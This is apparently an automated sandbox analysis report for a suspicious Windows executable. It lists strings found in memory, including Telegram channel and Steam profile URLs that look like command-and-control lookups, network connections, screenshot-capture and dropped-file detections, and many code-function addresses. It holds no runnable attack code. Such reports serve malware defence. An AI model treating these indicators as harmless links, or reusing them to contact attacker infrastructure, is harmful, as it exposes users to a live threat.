Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: DHCBGD.2.dr	String found in binary or memory: https://support.mozilla.org
Source: DHCBGD.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DHCBGD.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/JDc
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fun88rockskek
Source: 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fun88rockskekHn
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fun88rockskekcarrghttps://steamcommunity.com/profiles/76561199786602107g0b4csql.dllsqlp
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/fun88rockskeki
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjoke
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
Source: 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org#
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399181312.0000000019C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399181312.0000000019C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: DHCBGD.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_00931F2A

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File dump: AttoConvertVideo.exe.0.dr 979379375

Jump to dropped file

Contains functionality to call native functions

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0092145B GetCurrentProcess,NtQueryInformationProcess,

2_2_0092145B

Detected potential crypto function

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093C603	2_2_0093C603
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093B8A3	2_2_0093B8A3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094DAC3	2_2_0094DAC3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094D353	2_2_0094D353
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00939698	2_2_00939698
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094CEBE	2_2_0094CEBE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094DEAB	2_2_0094DEAB
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094D6F1	2_2_0094D6F1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA4ECC0	2_2_6CA4ECC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAAECD0	2_2_6CAAECD0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2AC30	2_2_6CB2AC30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB16C00	2_2_6CB16C00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA5AC60	2_2_6CA5AC60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA54DB0	2_2_6CA54DB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE6D90	2_2_6CAE6D90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBDCDC0	2_2_6CBDCDC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBD8D20	2_2_6CBD8D20
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1ED70	2_2_6CB1ED70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB7AD50	2_2_6CB7AD50
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAD6E90	2_2_6CAD6E90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA5AEC0	2_2_6CA5AEC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAF0EC0	2_2_6CAF0EC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB30E20	2_2_6CB30E20
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAEEE70	2_2_6CAEEE70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB98FB0	2_2_6CB98FB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA5EFB0	2_2_6CA5EFB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2EFF0	2_2_6CB2EFF0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA50FE0	2_2_6CA50FE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB90F20	2_2_6CB90F20
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA56F10	2_2_6CA56F10
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB12F70	2_2_6CB12F70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CABEF40	2_2_6CABEF40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB568E0	2_2_6CB568E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAA0820	2_2_6CAA0820
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CADA820	2_2_6CADA820
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB24840	2_2_6CB24840
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB109B0	2_2_6CB109B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE09A0	2_2_6CAE09A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB0A9A0	2_2_6CB0A9A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB6C9E0	2_2_6CB6C9E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA849F0	2_2_6CA849F0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAA6900	2_2_6CAA6900
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA88960	2_2_6CA88960
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CACEA80	2_2_6CACEA80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB08A30	2_2_6CB08A30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAFEA00	2_2_6CAFEA00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CACCA70	2_2_6CACCA70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAF0BA0	2_2_6CAF0BA0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB56BE0	2_2_6CB56BE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB7A480	2_2_6CB7A480
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA964D0	2_2_6CA964D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAEA4D0	2_2_6CAEA4D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB4420	2_2_6CAB4420
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CADA430	2_2_6CADA430
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA68460	2_2_6CA68460
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA445B0	2_2_6CA445B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1A5E0	2_2_6CB1A5E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CADE5F0	2_2_6CADE5F0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB2560	2_2_6CAB2560
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAF0570	2_2_6CAF0570
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB98550	2_2_6CB98550
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAA8540	2_2_6CAA8540
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB54540	2_2_6CB54540
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAAE6E0	2_2_6CAAE6E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAEE6E0	2_2_6CAEE6E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA746D0	2_2_6CA746D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAAC650	2_2_6CAAC650
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA7A7D0	2_2_6CA7A7D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAD0700	2_2_6CAD0700
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB2C0B0	2_2_6CB2C0B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA600B0	2_2_6CA600B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA48090	2_2_6CA48090
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB18010	2_2_6CB18010
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1C000	2_2_6CB1C000
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA9E070	2_2_6CA9E070
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA501E0	2_2_6CA501E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB34130	2_2_6CB34130
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAC6130	2_2_6CAC6130
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB8140	2_2_6CAB8140
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1E2B0	2_2_6CB1E2B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB222A0	2_2_6CB222A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CBD62C0	2_2_6CBD62C0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB28220	2_2_6CB28220
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB1A210	2_2_6CB1A210
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAD8260	2_2_6CAD8260
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAE8250	2_2_6CAE8250
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA823A0	2_2_6CA823A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAAE3B0	2_2_6CAAE3B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAA43E0	2_2_6CAA43E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAC2320	2_2_6CAC2320
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB92370	2_2_6CB92370
